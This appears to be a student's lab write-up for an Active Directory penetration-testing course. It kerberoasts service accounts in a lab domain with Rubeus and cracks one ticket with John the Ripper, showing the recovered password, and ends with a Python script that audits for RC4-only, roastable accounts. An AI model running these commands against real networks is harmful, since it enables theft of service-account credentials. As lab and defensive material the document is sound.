Learning Objective - 14
We list the services in the AD.
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
DistinguishedName : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 956ae091-be8d-49da-966b-0daa8d291bb2
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-719815819-3726368948-3917688648-502
Surname :
UserPrincipalName :
DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : True
GivenName : web
Name : web svc
ObjectClass : user
ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe
SamAccountName : websvc
ServicePrincipalName : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
SID : S-1-5-21-719815819-3726368948-3917688648-1114
Surname : svc
UserPrincipalName : websvc
DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled : True
GivenName : svc
Name : svc admin
ObjectClass : user
ObjectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
ServicePrincipalName : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
SID : S-1-5-21-719815819-3726368948-3917688648-1118
Surname : admin
UserPrincipalName : svcadmin
PS C:\AD\Tools\ADModule-master\ActiveDirectory>
We obtain the information.
PS C:\AD\Tools> .\Rubeus.exe kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 2
[*] SamAccountName : websvc
[*] DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet : 11/14/2022 4:42:13 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : [krb5tgs etype 23 hash omitted]
[*] SamAccountName : svcadmin
[*] DistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet : 11/14/2022 9:06:37 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : [krb5tgs etype 23 hash omitted]
Or alternatively:
PS C:\AD\Tools> .\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:hash.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Kerberoasting
[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Target User : svcadmin
[*] Target Domain : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'
[*] Total kerberoastable users : 1
[*] Hash written to C:\AD\Tools\hash.txt
[*] Roasted hashes written to : C:\AD\Tools\hash.txt
DO NOT FORGET TO OPEN THE FILE hash.txt and remove the SQL service port before cracking.
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*ThisisBlasphemyThisisMadness!! (?)
1g 0:00:00:00 DONE (2024-03-01 05:02) 13.15g/s 26947p/s 26947c/s 26947C/s energy..mollie
Use the "--show" option to display all of the cracked passwords reliably
Session completed
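From the defender's side, the two LDAP filters Rubeus prints above describe exactly which accounts are exposed: enabled users with an SPN, and among them those with no AES bit set in msDS-SupportedEncryptionTypes. The following is an added example, not part of the original notes or of Rubeus, that applies the same bit logic to exported account records to flag service accounts needing AES and a password rotation. Assumptions: the record layout, the uac values, krbtgt's date, the 365-day threshold and the `aessvc` account are constructed for illustration.

```python
from datetime import datetime

UAC_ACCOUNTDISABLE = 0x2   # bit tested by (UserAccountControl:1.2.840.113556.1.4.803:=2)
AES_MASK = 0x8 | 0x10      # AES128 | AES256 = 24, the value in the /rc4opsec filter

def is_roastable(acct):
    """First filter above: has an SPN, is not krbtgt, is not disabled."""
    return (bool(acct["spns"]) and acct["sam"].lower() != "krbtgt"
            and not acct["uac"] & UAC_ACCOUNTDISABLE)

def rc4_only(acct):
    """Rule ...804 matches if ANY masked bit is set; negated, it means no AES bit.
    An unset msDS-SupportedEncryptionTypes (None) therefore counts as RC4-only."""
    return not (acct.get("etypes") or 0) & AES_MASK

def audit(accounts, now, max_age_days=365):
    """Return one finding per roastable account, with the hardening gaps found."""
    findings = []
    for acct in accounts:
        if not is_roastable(acct):
            continue
        issues = []
        if rc4_only(acct):
            issues.append("no AES bits in msDS-SupportedEncryptionTypes")
        age = (now - acct["pwd_last_set"]).days
        if age > max_age_days:
            issues.append(f"password is {age} days old")
        findings.append({"sam": acct["sam"], "issues": issues})
    return findings

# Constructed sample: names, SPNs and PwdLastSet for websvc/svcadmin come from the
# output above; uac values, krbtgt's date and the 'aessvc' account are made up.
SAMPLE = [
    {"sam": "krbtgt", "spns": ["kadmin/changepw"], "uac": 0x202, "etypes": None,
     "pwd_last_set": datetime(2022, 11, 12)},
    {"sam": "websvc", "spns": ["SNMP/ufc-adminsrv"], "uac": 0x200, "etypes": None,
     "pwd_last_set": datetime(2022, 11, 14, 4, 42, 13)},
    {"sam": "svcadmin", "spns": ["MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433"],
     "uac": 0x200, "etypes": None, "pwd_last_set": datetime(2022, 11, 14, 9, 6, 37)},
    {"sam": "aessvc", "spns": ["HTTP/example-host"], "uac": 0x200, "etypes": 0x18,
     "pwd_last_set": datetime(2024, 1, 15)},
]
NOW = datetime(2024, 3, 1)  # date of the john run shown above

if __name__ == "__main__":
    for f in audit(SAMPLE, NOW):
        print(f["sam"], "->", "; ".join(f["issues"]) or "ok")
```
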